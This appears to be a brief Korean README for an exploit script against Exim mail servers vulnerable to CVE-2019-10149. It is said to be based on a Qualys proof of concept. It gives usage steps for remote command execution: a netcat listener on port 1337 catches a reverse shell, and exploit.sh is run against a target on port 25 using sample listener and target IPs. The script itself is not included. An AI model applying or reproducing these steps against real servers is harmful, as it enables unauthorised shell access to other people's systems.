
취약한 exim 서비스로부터 쉘로의 원격 명령 실행
취약한 exim 서비스로부터 셸로 원격 명령 실행.
취약한 버전은 4.87부터 4.91까지(포함)입니다. https://nvd.nist.gov/vuln/detail/cve-2019-10149 확인.
다음 스크립트는 Qualys PoC를 기반으로 합니다. https://packetstormsecurity.com/files/153218/Exim-4.9.1-Remote-Command-Execution.html 확인.
2개의 터미널 권장
T1 $ nc -nlvp 1337
T2 $ bash exploit.sh
$ Listener IP: 192.168.0.1
$ Listener Port: 1337
$ Exim IP: 10.10.0.1
$ Exim Port: 25